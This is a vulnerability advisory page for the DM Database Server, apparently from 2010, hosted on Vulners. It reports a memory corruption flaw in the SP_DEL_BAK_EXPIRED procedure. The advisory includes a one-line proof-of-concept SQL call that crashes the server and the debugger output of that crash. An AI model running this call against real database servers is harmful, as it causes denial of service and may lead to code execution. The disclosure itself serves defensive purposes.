Vulners
Lucene search
DM Database Server Memory Corruption
`DM Database Server Memory Corruption Vulnerability
Vulnerable: All Version
Vendor: www.dameng.com
Discovered by: Shennan Wang (HuaweiSymantec SRT)
Details:
=========
A vulnerability in DM Database Server all version allows attacker to execute arbitrary code or cause a DoS (Denial of
Service).Authentication is required to exploit this vulnerability.
The specific flaw exists within the SP_DEL_BAK_EXPIRED procedure.
POC:
=========
CALL SP_DEL_BAK_EXPIRED('AAAAAAAAAAAAAAAAAAAA', '');
(458.5fc): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=02d3d430 ecx=ffffffff edx=074ecfd0 esi=074ed37c edi=0000041c
eip=100d1753 esp=074eccec ebp=074ed1fc iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
*** WARNING: Unable to verify checksum for C:\dmdbms\bin\wdm_dll.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\dmdbms\bin\wdm_dll.dll -
wdm_dll+0xd1753:
100d1753 f2ae repne scas byte ptr es:[edi]
0:009> da ebp
074ed1fc "AAAAAAAAAAAAAAAAAAAA"
Timeline:
========
2010.04.17 Report to vendor,no response.
2010.05.31 Public
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Jun 2010 00:00Current
0.4Low risk
Vulners AI Score0.4